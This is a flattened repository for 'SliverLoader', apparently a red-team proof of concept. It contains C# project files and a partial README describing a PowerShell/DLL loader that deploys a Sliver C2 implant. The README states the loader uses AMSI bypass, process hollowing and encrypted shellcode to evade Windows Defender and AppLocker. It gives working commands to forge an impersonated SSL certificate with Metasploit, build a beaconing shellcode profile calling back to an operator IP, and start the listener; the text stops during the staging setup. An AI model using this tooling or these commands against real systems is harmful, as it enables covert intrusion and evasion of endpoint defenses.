├── doc
    └── img
    │   ├── sliver001.png
    │   ├── sliver002.png
    │   ├── cyberchef001.png
    │   ├── cyberchef002.png
    │   └── metasploit001.png
├── SliverBypassLoader
    ├── App.config
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── SliverBypassLoader.csproj
    └── Program.cs
├── SliverLoader
    ├── packages.config
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── SliverLoader.csproj
    └── Loader.cs
├── SliverLoader.sln
├── .gitattributes
├── .gitignore
└── README.md


/doc/img/sliver001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cyb3rDudu/SliverLoader/HEAD/doc/img/sliver001.png


--------------------------------------------------------------------------------
/doc/img/sliver002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cyb3rDudu/SliverLoader/HEAD/doc/img/sliver002.png


--------------------------------------------------------------------------------
/doc/img/cyberchef001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cyb3rDudu/SliverLoader/HEAD/doc/img/cyberchef001.png


--------------------------------------------------------------------------------
/doc/img/cyberchef002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cyb3rDudu/SliverLoader/HEAD/doc/img/cyberchef002.png


--------------------------------------------------------------------------------
/doc/img/metasploit001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cyb3rDudu/SliverLoader/HEAD/doc/img/metasploit001.png


--------------------------------------------------------------------------------
/SliverBypassLoader/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/SliverLoader/packages.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <packages>
3 |   <package id="ArmDot.Engine.MSBuildTasks" version="2024.7.0" targetFramework="net472" />
4 |   <package id="log4net" version="2.0.15" targetFramework="net472" />
5 | </packages>


--------------------------------------------------------------------------------
/SliverBypassLoader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("SliverBypassLoader")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SliverBypassLoader")]
13 | [assembly: AssemblyCopyright("Copyright ©  2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("bfbb1411-5324-4481-a939-34fe3c860bae")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | [assembly: AssemblyVersion("1.0.0.0")]
33 | [assembly: AssemblyFileVersion("1.0.0.0")]
34 | 


--------------------------------------------------------------------------------
/SliverLoader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("SliverLoader")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SliverLoader")]
13 | [assembly: AssemblyCopyright("Copyright ©  2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("dc413bc6-fa59-47cc-ba69-4491015a8d07")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/SliverLoader.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.9.34607.119
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SliverLoader", "SliverLoader\SliverLoader.csproj", "{DC413BC6-FA59-47CC-BA69-4491015A8D07}"
 7 | EndProject
 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SliverBypassLoader", "SliverBypassLoader\SliverBypassLoader.csproj", "{BFBB1411-5324-4481-A939-34FE3C860BAE}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|Any CPU = Debug|Any CPU
13 | 		Debug|x64 = Debug|x64
14 | 		Release|Any CPU = Release|Any CPU
15 | 		Release|x64 = Release|x64
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
19 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Debug|Any CPU.Build.0 = Debug|Any CPU
20 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Debug|x64.ActiveCfg = Debug|x64
21 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Debug|x64.Build.0 = Debug|x64
22 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Release|Any CPU.Build.0 = Release|Any CPU
24 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Release|x64.ActiveCfg = Release|x64
25 | 		{DC413BC6-FA59-47CC-BA69-4491015A8D07}.Release|x64.Build.0 = Release|x64
26 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
27 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Debug|Any CPU.Build.0 = Debug|Any CPU
28 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Debug|x64.ActiveCfg = Debug|Any CPU
29 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Debug|x64.Build.0 = Debug|Any CPU
30 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Release|Any CPU.ActiveCfg = Release|Any CPU
31 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Release|Any CPU.Build.0 = Release|Any CPU
32 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Release|x64.ActiveCfg = Release|Any CPU
33 | 		{BFBB1411-5324-4481-A939-34FE3C860BAE}.Release|x64.Build.0 = Release|Any CPU
34 | 	EndGlobalSection
35 | 	GlobalSection(SolutionProperties) = preSolution
36 | 		HideSolutionNode = FALSE
37 | 	EndGlobalSection
38 | 	GlobalSection(ExtensibilityGlobals) = postSolution
39 | 		SolutionGuid = {565D1A9F-DF6C-4A6B-9A6F-4A36F6F15DE0}
40 | 	EndGlobalSection
41 | EndGlobal
42 | 


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
 1 | ###############################################################################
 2 | # Set default behavior to automatically normalize line endings.
 3 | ###############################################################################
 4 | * text=auto
 5 | 
 6 | ###############################################################################
 7 | # Set default behavior for command prompt diff.
 8 | #
 9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs     diff=csharp
14 | 
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following 
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln       merge=binary
26 | #*.csproj    merge=binary
27 | #*.vbproj    merge=binary
28 | #*.vcxproj   merge=binary
29 | #*.vcproj    merge=binary
30 | #*.dbproj    merge=binary
31 | #*.fsproj    merge=binary
32 | #*.lsproj    merge=binary
33 | #*.wixproj   merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj   merge=binary
36 | #*.wwaproj   merge=binary
37 | 
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg   binary
44 | #*.png   binary
45 | #*.gif   binary
46 | 
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | # 
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the 
52 | # entries below.
53 | ###############################################################################
54 | #*.doc   diff=astextplain
55 | #*.DOC   diff=astextplain
56 | #*.docx  diff=astextplain
57 | #*.DOCX  diff=astextplain
58 | #*.dot   diff=astextplain
59 | #*.DOT   diff=astextplain
60 | #*.pdf   diff=astextplain
61 | #*.PDF   diff=astextplain
62 | #*.rtf   diff=astextplain
63 | #*.RTF   diff=astextplain
64 | 


--------------------------------------------------------------------------------
/SliverBypassLoader/SliverBypassLoader.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{BFBB1411-5324-4481-A939-34FE3C860BAE}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>SliverBypassLoader</RootNamespace>
10 |     <AssemblyName>SliverBypassLoader</AssemblyName>
11 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 |     <PlatformTarget>AnyCPU</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <ItemGroup>
36 |     <Reference Include="System" />
37 |     <Reference Include="System.Configuration.Install" />
38 |     <Reference Include="System.Core" />
39 |     <Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
40 |       <SpecificVersion>False</SpecificVersion>
41 |       <HintPath>C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
42 |     </Reference>
43 |     <Reference Include="System.Xml.Linq" />
44 |     <Reference Include="System.Data.DataSetExtensions" />
45 |     <Reference Include="Microsoft.CSharp" />
46 |     <Reference Include="System.Data" />
47 |     <Reference Include="System.Net.Http" />
48 |     <Reference Include="System.Xml" />
49 |   </ItemGroup>
50 |   <ItemGroup>
51 |     <Compile Include="Program.cs" />
52 |     <Compile Include="Properties\AssemblyInfo.cs" />
53 |   </ItemGroup>
54 |   <ItemGroup>
55 |     <None Include="App.config" />
56 |   </ItemGroup>
57 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
58 | </Project>


--------------------------------------------------------------------------------
/SliverLoader/SliverLoader.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="..\packages\ArmDot.Engine.MSBuildTasks.2024.7.0\build\ArmDot.Engine.MSBuildTasks.props" Condition="Exists('..\packages\ArmDot.Engine.MSBuildTasks.2024.7.0\build\ArmDot.Engine.MSBuildTasks.props')" />
 4 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 5 |   <PropertyGroup>
 6 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 7 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 8 |     <ProjectGuid>{DC413BC6-FA59-47CC-BA69-4491015A8D07}</ProjectGuid>
 9 |     <OutputType>Library</OutputType>
10 |     <AppDesignerFolder>Properties</AppDesignerFolder>
11 |     <RootNamespace>SliverLoader</RootNamespace>
12 |     <AssemblyName>SliverLoader</AssemblyName>
13 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
14 |     <FileAlignment>512</FileAlignment>
15 |     <Deterministic>true</Deterministic>
16 |     <NuGetPackageImportStamp>
17 |     </NuGetPackageImportStamp>
18 |   </PropertyGroup>
19 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
20 |     <DebugSymbols>true</DebugSymbols>
21 |     <DebugType>full</DebugType>
22 |     <Optimize>false</Optimize>
23 |     <OutputPath>bin\Debug\</OutputPath>
24 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
25 |     <ErrorReport>prompt</ErrorReport>
26 |     <WarningLevel>4</WarningLevel>
27 |   </PropertyGroup>
28 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
29 |     <DebugType>pdbonly</DebugType>
30 |     <Optimize>true</Optimize>
31 |     <OutputPath>bin\Release\</OutputPath>
32 |     <DefineConstants>TRACE</DefineConstants>
33 |     <ErrorReport>prompt</ErrorReport>
34 |     <WarningLevel>4</WarningLevel>
35 |   </PropertyGroup>
36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
37 |     <DebugSymbols>true</DebugSymbols>
38 |     <OutputPath>bin\x64\Debug\</OutputPath>
39 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
40 |     <DebugType>full</DebugType>
41 |     <PlatformTarget>x64</PlatformTarget>
42 |     <LangVersion>7.3</LangVersion>
43 |     <ErrorReport>prompt</ErrorReport>
44 |   </PropertyGroup>
45 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
46 |     <OutputPath>bin\x64\Release\</OutputPath>
47 |     <DefineConstants>TRACE</DefineConstants>
48 |     <Optimize>true</Optimize>
49 |     <DebugType>pdbonly</DebugType>
50 |     <PlatformTarget>x64</PlatformTarget>
51 |     <LangVersion>7.3</LangVersion>
52 |     <ErrorReport>prompt</ErrorReport>
53 |   </PropertyGroup>
54 |   <ItemGroup>
55 |     <Reference Include="log4net, Version=2.0.15.0, Culture=neutral, PublicKeyToken=669e0ddf0bb1aa2a, processorArchitecture=MSIL">
56 |       <HintPath>..\packages\log4net.2.0.15\lib\net45\log4net.dll</HintPath>
57 |     </Reference>
58 |     <Reference Include="System" />
59 |     <Reference Include="System.Configuration" />
60 |     <Reference Include="System.Core" />
61 |     <Reference Include="System.Web" />
62 |     <Reference Include="System.Xml.Linq" />
63 |     <Reference Include="System.Data.DataSetExtensions" />
64 |     <Reference Include="Microsoft.CSharp" />
65 |     <Reference Include="System.Data" />
66 |     <Reference Include="System.Net.Http" />
67 |     <Reference Include="System.Xml" />
68 |   </ItemGroup>
69 |   <ItemGroup>
70 |     <Compile Include="Loader.cs" />
71 |     <Compile Include="Properties\AssemblyInfo.cs" />
72 |   </ItemGroup>
73 |   <ItemGroup>
74 |     <None Include="packages.config" />
75 |   </ItemGroup>
76 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
77 |   <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
78 |     <PropertyGroup>
79 |       <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
80 |     </PropertyGroup>
81 |     <Error Condition="!Exists('..\packages\ArmDot.Engine.MSBuildTasks.2024.7.0\build\ArmDot.Engine.MSBuildTasks.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\ArmDot.Engine.MSBuildTasks.2024.7.0\build\ArmDot.Engine.MSBuildTasks.props'))" />
82 |   </Target>
83 | </Project>


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Ww][Ii][Nn]32/
 27 | [Aa][Rr][Mm]/
 28 | [Aa][Rr][Mm]64/
 29 | bld/
 30 | [Bb]in/
 31 | [Oo]bj/
 32 | [Oo]ut/
 33 | [Ll]og/
 34 | [Ll]ogs/
 35 | 
 36 | # Visual Studio 2015/2017 cache/options directory
 37 | .vs/
 38 | # Uncomment if you have tasks that create the project's static files in wwwroot
 39 | #wwwroot/
 40 | 
 41 | # Visual Studio 2017 auto generated files
 42 | Generated\ Files/
 43 | 
 44 | # MSTest test Results
 45 | [Tt]est[Rr]esult*/
 46 | [Bb]uild[Ll]og.*
 47 | 
 48 | # NUnit
 49 | *.VisualState.xml
 50 | TestResult.xml
 51 | nunit-*.xml
 52 | 
 53 | # Build Results of an ATL Project
 54 | [Dd]ebugPS/
 55 | [Rr]eleasePS/
 56 | dlldata.c
 57 | 
 58 | # Benchmark Results
 59 | BenchmarkDotNet.Artifacts/
 60 | 
 61 | # .NET Core
 62 | project.lock.json
 63 | project.fragment.lock.json
 64 | artifacts/
 65 | 
 66 | # ASP.NET Scaffolding
 67 | ScaffoldingReadMe.txt
 68 | 
 69 | # StyleCop
 70 | StyleCopReport.xml
 71 | 
 72 | # Files built by Visual Studio
 73 | *_i.c
 74 | *_p.c
 75 | *_h.h
 76 | *.ilk
 77 | *.meta
 78 | *.obj
 79 | *.iobj
 80 | *.pch
 81 | *.pdb
 82 | *.ipdb
 83 | *.pgc
 84 | *.pgd
 85 | *.rsp
 86 | *.sbr
 87 | *.tlb
 88 | *.tli
 89 | *.tlh
 90 | *.tmp
 91 | *.tmp_proj
 92 | *_wpftmp.csproj
 93 | *.log
 94 | *.vspscc
 95 | *.vssscc
 96 | .builds
 97 | *.pidb
 98 | *.svclog
 99 | *.scc
100 | 
101 | # Chutzpah Test files
102 | _Chutzpah*
103 | 
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 | 
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 | 
121 | # Visual Studio Trace Files
122 | *.e2e
123 | 
124 | # TFS 2012 Local Workspace
125 | $tf/
126 | 
127 | # Guidance Automation Toolkit
128 | *.gpState
129 | 
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 | 
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 | 
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 | 
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 | 
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 | 
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 | 
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 | 
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 | 
163 | # Web workbench (sass)
164 | .sass-cache/
165 | 
166 | # Installshield output folder
167 | [Ee]xpress/
168 | 
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 | 
179 | # Click-Once directory
180 | publish/
181 | 
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 | 
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 | 
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 | 
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 | 
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 | 
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 | 
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 | 
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 | 
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 | 
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 | 
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 | 
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 | 
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 | 
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 | 
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 | 
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 | 
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 | 
288 | # Visual Studio 6 build log
289 | *.plg
290 | 
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 | 
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 | 
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 | 
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 | 
309 | # FAKE - F# Make
310 | .fake/
311 | 
312 | # CodeRush personal settings
313 | .cr/personal
314 | 
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 | 
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 | 
323 | # Tabs Studio
324 | *.tss
325 | 
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 | 
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 | 
335 | # OpenCover UI analysis results
336 | OpenCover/
337 | 
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 | 
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 | 
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 | 
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 | 
350 | # Local History for Visual Studio
351 | .localhistory/
352 | 
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 | 
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 | 
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 | 
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
364 | 
365 | # Custom folders
366 | certs
367 | 
368 | # Custom Files
369 | SliverPhollow.txt


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # SliverLoader
  2 | 
  3 | This proof of concept (PoC) utilizes a DLL and a PowerShell loader to deploy a Sliver Agent, incorporating AMSI bypass, process injection, hollowing, and operational security (OpSec) through an impersonated SSL certificate. The shellcode runner is implemented in C# using the .NET Framework 4.0, which is typically pre-installed on Windows 10 and newer systems, and is also available on many updated legacy systems. Execution is facilitated via PowerShell. The PoC aims to bypass defenses including Windows Defender, AMSI, PowerShell Constrained Language Mode, and AppLocker. Additionally, the runner employs HTTPS protocol utilizing custom SSL certificates and keys for staging, and employs AES encryption to further obfuscate the shellcode, enhancing security layers.
  4 | 
  5 | ## SSL Certificate
  6 | 
  7 | To encrypt the traffic, a self-signed certificate is used, which fetches information from a specified URL to make the certificate appear more legitimate. There is a module created by Chris John Riley called **impersonate_ssl** that generates a certificate based on the information it gathers from the certificate of a website specified in the module's RHOST parameter.
  8 | ```text
  9 | msf6 > use auxiliary/gather/impersonate_ssl
 10 | msf6 auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
 11 | RHOST => www.google.com
 12 | msf6 auxiliary(gather/impersonate_ssl) > run
 13 | ```
 14 | ![Generate SSL Certificate with metasploit](./doc/img/metasploit001.png)
 15 | 
 16 | For further handling, the certificate is copied to `/tmp/certs/` as `crt.crt`, `pem.pem` and `key.key`.
 17 | 
 18 | ## Sliver C2 Setup
 19 | 
 20 | The chosen Command and Control (C2) framework is [Sliver](https://github.com/BishopFox/sliver) developed by BishopFox, although the concept is adaptable to other frameworks such as Metasploit or Havoc. Follow the installation instructions provided on the [Getting Started](https://sliver.sh/docs?name=Getting+Started) page of Sliver's wiki to set it up.
 21 | 
 22 | The next steps involve setting up the necessary profile, listener, and stage-listener. It is noted that the IP addresses and paths to assets, such as certificates, need to be adjusted to fit the specific environment.
 23 | 
 24 | 1. Create a reusable profile for the scenario
 25 | ```text
 26 | sliver > profiles new -b https://192.168.8.205:443 --skip-symbols --format shellcode --arch amd64 monkeybox
 27 | ```
 28 | 2. Start the listener with the same port as specified in the profile and the certificate and key generated from metasploit
 29 | ```text
 30 | https -L 192.168.8.205 -l 443 -c /tmp/certs/crt.crt -k /tmp/certs/key.key
 31 | ```
 32 | 3. Start the stageing server on port 8443 with the HTTPS protocol and the generated certificates. Additional, the the compression algorithm in addition to the AES Encryption Keys has to be passed to the command.
 33 | ```text
